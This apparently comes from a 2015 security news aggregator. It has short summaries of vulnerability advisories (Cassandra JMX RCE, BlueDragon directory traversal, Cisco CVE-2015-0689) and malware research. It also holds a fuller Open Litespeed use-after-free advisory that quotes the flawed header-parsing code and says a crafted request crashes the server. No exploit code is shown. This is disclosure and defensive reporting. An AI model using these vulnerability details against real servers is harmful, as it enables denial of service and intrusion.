(  Basically, this program reads
SQL text from standard input and passes it through to SQLite for evaluation,
just like the "sqlite3" command-line shell.

more here..........’s HTTP-only login page puts millions of passwords at risk

HTTPS error has been active for weeks, but few seem to have noticed

more details here.........

So, you won a regional and you’re headed to National CCDC

The 2015 National CCDC season started with 100+ teams across 10 regions. Now, there are 10 teams left and they’re headed to the National CCDC event next week. If you’re on one of those student teams, this blog post is for you. I’d like to take you inside the red team room and give you my perspective on what you can expect and some ideas that may help you win here.....

Security expert pulled off flight by FBI after exposing airline tech vulnerabilities

One of the world’s foremost experts on counter-threat intelligence within the cybersecurity industry, who blew the whistle on vulnerabilities in airplane technology systems in a series of recent Fox News reports, has become the target of an FBI investigation himself.

Chris Roberts of the Colorado-based One World Labs, a security intelligence firm that identifies risks before they're exploited, said two FBI agents and two uniformed police officers pulled him off a United Airlines Boeing 737-800 commercial flight Wednesday night just after it landed in Syracuse, and spent the next four hours questioning him about cyberhacking of planes.

more here........


Many malicious binaries use a command and control server centralised on a dedicated domain, which is simple to operate but likely to be shut down by specialised companies like Lexsi or LEAs. Malware authors have been using decentralised network infrastructures for a few years to ensure their botnet will be more resilient, implying the development of new tools to monitor their evolution. CERT-LEXSI is using “lofts” for that purpose, that is to say virtual machines specially configured to decrypt communications in real time and extract banking malware configuration files and look for newly targeted banks.

more here..........

MS15-034 Detection: Some Observations

Several detection rules (SNORT, F5, …) are being published these days to detect exploitation of vulnerability MS15-034.

If you are making or modifying such detection rules, I want to share some observations with you here.....

Apache Cassandra JMX/RMI Remote Code Execution & Cisco Cloud Web Security Connector JMX/RMI Remote Code Execution

Apache Cassandra was found to bind an unauthenticated JMX/RMI service on all network interfaces. An adversary with network access may abuse this service and achieve arbitrary remote code execution as the running user.

more here...........

A vulnerability exists in Cisco Cloud Web Security Connector which allows unauthenticated users to gain unauthorised access with administrative privileges on the target host. Cisco confirmed this vulnerability and assigned CVE-2015-0689

more here..........

WikiLeaks publishes an analysis and search system for The Sony Archives: 30,287 documents from Sony Pictures Entertainment (SPE)

WikiLeaks publishes an analysis and search system for The Sony Archives: 30,287 documents from Sony Pictures Entertainment (SPE) and 173,132 emails, to and from more than 2,200 SPE email addresses.

more here......


Python In The Middle : a Python implementation of MITM attacks here........

CVE-2014-5370 - Arbitrary File Retrieval + Deletion In New Atlanta BlueDragon CFChart Servlet

Vulnerability title: Arbitrary File Retrieval + Deletion In New Atlanta BlueDragon CFChart Servlet
CVE: CVE-2014-5370
Vendor: New Atlanta
Product: BlueDragon CFChart Servlet
Affected version:
Fixed version:
Reported by: Mike Westmacott

The CFChart servlet of BlueDragon (component com.naryx.tagfusion.cfm.cfchartServlet) is vulnerable to arbitrary file retrieval due to a directory traversal vulnerability. In certain circumstances the retrieved file is also deleted.


The National High Tech Crime Unit (NHTCU) of the Netherlands’ police, the Netherlands’ National Prosecutors Office and Kaspersky Lab have been working together to fight the CoinVault ransomware campaign. During our joint investigation we have been able to obtain data that can help you to decrypt the files being held hostage on your PC. We provide both decryption keys and the decryption application.

more here.........

Beyond annoyance: security risks of unwanted ad injectors

Last month, we posted about unwanted ad injectors, a common side-effect of installing unwanted software. Ad injectors are often annoying, but in some cases, they can jeopardize users’ security as well. Today, we want to shed more light on how ad injector software can hijack even encrypted SSL browser communications.

Andromeda/Gamarue bot loves JSON too (new versions details)

After my last post about Andromeda different updates related to version 2.07 and 2.08 appeared. Mostly, Fortinet was talking about the version 2.7 features and the new anti-analysis tricks of version 2.08. After that, Kimberly was also mentioning version 2.09 in his blog but I have not seen too many details about the latest versions of Andromeda. This is a summary of the interesting details about the newer versions here...........

15 Vulnerable Sites To (Legally) Practice Your Hacking Skills

15 deliberately vulnerable sites to practice your hacking skills so you can be the best defender you can – whether you’re a developer, security manager, auditor or pen-tester.

more here.....

Thursday, April 16, 2015


Today we sent a letter to lawmakers expressing security experts' opposition to the Cybersecurity Information Sharing Act (CISA) as well as two other pending bills that purport to be about security information sharing, the Protecting Cyber Networks Act (PCNA), and the National Cybersecurity Protection Advancement Act of 2015. These experts agree that the information sharing bills unnecessarily waive privacy rights because they focus on sharing information beyond that needed for cybersecurity.

more here........

Reverse Engineered: Capcom CPS1 - Part 1

For most of the 80's, arcade titles were the product of intense hardware and software custom design work. With every new game title came a new board design and the full dedication of multiple specialized teams including experts in hardware, electronics, software, game design, graphics, sound... the list goes on and on.

Competition, faster release cycles, and the need for continued improved financial results, drove arcade manufacturers into operational optimization and standardization efforts with the ultimate goal of focusing into their true core business: producing successful video games, not hardware.

With the introduction in 1988 of the Capcom Play System 1 (CPS-1) by Capcom, the company signaled a new era in game design quality and hardware platform maturity.

more here.........

PHP 5.6.8 is released

Changelog is here and its recommended you upgrade

more here....

Open Litespeed Use After Free Vulnerability

(    , )     (,
  .   '.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/:wq


Open Litespeed Use After Free Vulnerability
Affected versions: Open Litespeed <= 1.3.9


A use after free vulnerability was discovered within the header parser
of the Open Litespeed web server. This vulnerability can be successfully
exploited to trigger an out of bounds memory read, resulting in a
segmentation fault crashing the web server

By sending a crafted request, an attacker may trigger an out-of-bounds
memory read, crashing the web server. This is due to a portion of memory
being referenced by the application after being freed by a realloc() call.

The second parameter (p) to the memmove() call (line 741, httpreq.cpp)
within the HttpReq:newKeyValueBuf method results in an out of bound
memory read when the attacker submits a crafted requests contain a large
number of header rows. This is is due to the portion of memory the 'p'
parameter resides in being freed by a realloc() call. The reallocation
is performed by the allocate() method of the AutoBuf class. This is
triggered by the call to AutoBuf's grow() method within the
newKeyValueBuf method (line 736, httpreq.cpp). The newKeyValueBuf method
snippet is detailed below, showing the call to AutoBuf::Grow() and the
subsequent memmove() call:

 735         if ( m_reqBuf.available() < total )
 736             if ( m_reqBuf.grow( total ) )
 737                 return NULL;
 738         char * pNewBuf = m_reqBuf.end();
 739         m_reqBuf.used( total );
 740         if ( orgSize > 0 )
 741             memmove( pNewBuf, p, sizeof( int ) * 2 + sizeof(
key_value_pair ) * orgSize );
 742         else
 743             *( ((int *)pNewBuf) + 1 ) = 0;

Further information is available in the advisory PDF. POC exploit code
can be found at

| Solution |
Update to the latest version of the Open Litespeed web server

|Disclosure Timeline|
26/03/2015 - Advisory send to Litespeed
27/03/2015 - Response from Litespeed stating the vulnerability will be
fixed in the next release of Open Litespeed
10/04/2015 - Open Litespeed 1.3.10 released
14/04/2015 - Advisory PDF released

+-----------------------------+ is Australasia's leading team of Information
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
telecommunications, broadcasting, legal and government. Our aim is to
the very best independent advice and a high level of technical expertise
creating long and lasting professional relationships with our clients. is committed to security research and development,
and its team continues to identify and responsibly publish vulnerabilities
in public and private software vendor's products. Members of the R&D team are globally recognised through their
of whitepapers and presentations related to new security research.

For further information on this issue or any of our service offerings,
contact us:

Email info () security-assessment com
Phone +64 4 470 1650